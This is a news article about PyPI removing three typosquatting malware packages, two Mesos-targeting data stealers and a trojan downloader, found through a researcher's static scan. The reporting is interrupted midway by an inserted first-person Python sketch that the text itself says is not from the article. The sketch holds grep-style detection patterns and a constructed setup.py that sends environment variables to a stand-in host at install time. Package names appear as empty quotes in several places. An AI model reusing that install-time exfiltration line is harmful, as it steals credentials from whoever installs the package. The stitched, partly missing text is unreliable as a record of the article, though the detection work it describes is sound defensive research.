
PyPI administrators removed three malware packages after more than 10,000 downloads

Adam Bannister December 14, 2021 16:09 UTC

Updated: December 14, 2021 18:39 UTC

Two of the packages went undetected for 10 months

UPDATED The Python Package Index (PyPI) has removed malware-deploying and data-stealing packages that had collectively been downloaded thousands of times.

The three malicious packages deceived unsuspecting users by imitating the names of legitimate packages.

‘good reputation’

In the case of the two packages that steal data from an infected system, the download count may also have been inflated by the way the author deceptively boosted their credibility.

“Both packages list an existing popular library as their source code URL, so anyone browsing the package or analyzing the library’s popularity on PyPI will see a large number of GitHub stars and branches, indicating a good reputation,” said Andrew Scott, a product manager at Palo Alto and maintainer of the Python security project Ochrona Security, in a blog post.

Uploaded by the same user, the two packages, “” and “”, appear to target users of Apache Mesos, which is used to manage computer clusters.

They were uploaded to PyPI in February 2021 and have since been downloaded more than 10,000 times, including more than 600 downloads in the last month alone.

Scott reported them on December 13 and thanked the Python security team for promptly removing the packages the same day.

The third package, “”, which smuggled in a trojan, was downloaded approximately 600 times between its appearance on PyPI on December 1 and its removal on December 10, when PyPI administrators received an alert.

“I believe the purpose of aws-login0tool is to confuse users of a tool called aws-login-tool, which no longer exists on PyPI but does exist on some older mirrors,” Scott told The Daily Swig.

“The dpp-client package, I must assume, may be [intended to imitate] some internal component of a data processing pipeline tool, but I can’t confirm.”

Malicious operation

Scott said that all three packages were flagged as potential malware by the strings they import, “because this is usually used to steal data or download malicious files.”

The data stealers apparently look for files related to Apache Mesos, collect environment variables and file listings, and forward them to an “unknown web service”.

The trojan package performed a standard package installation before “getting the file from a non-descriptive domain” and attempting to execute that file, a known Windows trojan.

“It’s hard to know what effect these will have,” Scott said. “The Trojan horse package is limited to the malware’s functions. Data extraction will really depend on your environment, but I can definitely see it collecting things like AWS credentials and other API keys. I’m not sure what Mesos-specific information is stored in the target directory.”

Python detection

These findings came from a static analysis of approximately 200,000 PyPI packages, close to two-thirds of the total, after downloading them using Bandersnatch.

He extracted the packages by creating “a very simple Python script to recursively iterate Bandersnatch’s somewhat complicated folder structure, then unzip and extract each sdist, egg or wheel into a flat directory”.

“After the extraction, I ran many string and regular expression searches using grep, and then manually viewed the results,” Scott said.
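As an added, runnable sketch of that extract-then-grep workflow (my own example, not Scott’s script or any code from the article): it walks a Bandersnatch-style directory tree, unpacks each sdist or wheel into a flat directory, and runs regex searches for the import and call strings a triager would want to look at manually. The nested web/packages/... layout, the pattern list and the sample package are all assumptions or constructed for the demo.

```python
import io, os, re, tarfile, tempfile, zipfile
# Import/call strings worth a manual look in triage (my own heuristic list):
# environment/credential harvesting, outbound HTTP, download-and-execute, encoded payloads.
SUSPECT = {
    "env-harvest": re.compile(r"\bos\.environ\b"),
    "http-client": re.compile(r"\b(urllib\.request|requests|http\.client)\b"),
    "exec":        re.compile(r"\b(subprocess|os\.system|os\.popen)\b"),
    "encoding":    re.compile(r"\bbase64\.b64(de|en)code\b"),
}
def extract_flat(mirror_root, out_dir):
    # Walk the nested mirror tree (assumed Bandersnatch web/packages/... layout) and
    # unpack every sdist, egg or wheel into a flat out_dir/<archive-name>/ directory.
    kw = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}  # blocks ../ members
    for dirpath, _, files in os.walk(mirror_root):
        for name in files:
            src, dst = os.path.join(dirpath, name), os.path.join(out_dir, name)
            if name.endswith((".tar.gz", ".tgz")):
                with tarfile.open(src) as tf:
                    tf.extractall(dst, **kw)
            elif name.endswith((".whl", ".egg", ".zip")):
                with zipfile.ZipFile(src) as zf:
                    zf.extractall(dst)
def scan(out_dir):
    # grep-style pass over the extracted .py files -> {relative path: [labels]}
    hits = {}
    for dirpath, _, files in os.walk(out_dir):
        for name in (f for f in files if f.endswith(".py")):
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as fh:
                text = fh.read()
            labels = [k for k, rx in SUSPECT.items() if rx.search(text)]
            if labels:
                hits[os.path.relpath(path, out_dir)] = labels
    return hits
# Constructed sample, not a real package: a setup.py that harvests the environment
# and sends it out at install time, the behaviour the article attributes to the stealers.
SETUP_PY = b"""import os, base64, urllib.request, setuptools
urllib.request.urlopen('http://example.invalid/c', base64.b64encode(repr(dict(os.environ)).encode()))
setuptools.setup(name='demo-client', version='0.1')
"""
def triage_sample():  # build a one-package mirror in a temp dir, then extract and scan it
    work = tempfile.mkdtemp()
    pkg_dir = os.path.join(work, "mirror", "web", "packages", "ab", "cd", "demo-client")
    os.makedirs(pkg_dir)
    with tarfile.open(os.path.join(pkg_dir, "demo-client-0.1.tar.gz"), "w:gz") as tf:
        info = tarfile.TarInfo("demo-client-0.1/setup.py"); info.size = len(SETUP_PY)
        tf.addfile(info, io.BytesIO(SETUP_PY))
    out = os.path.join(work, "flat"); os.makedirs(out)
    extract_flat(os.path.join(work, "mirror"), out)
    return scan(out)
```

Point `extract_flat` at a real mirror root and `scan` at the flat output to reproduce the workflow; hits are only a shortlist for manual review, since legitimate installers also use these modules.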

The technique also surfaced a minor vulnerability in an open source package developed by a commercial vendor.

Scott says Safety, an open source software composition analysis tool, can help developers who use mirrors or who want to determine whether a package exists in their project.

He also intends to update and refine his package analysis, and will post other findings later.

This article was updated on December 14 with additional comments from Andrew Scott.
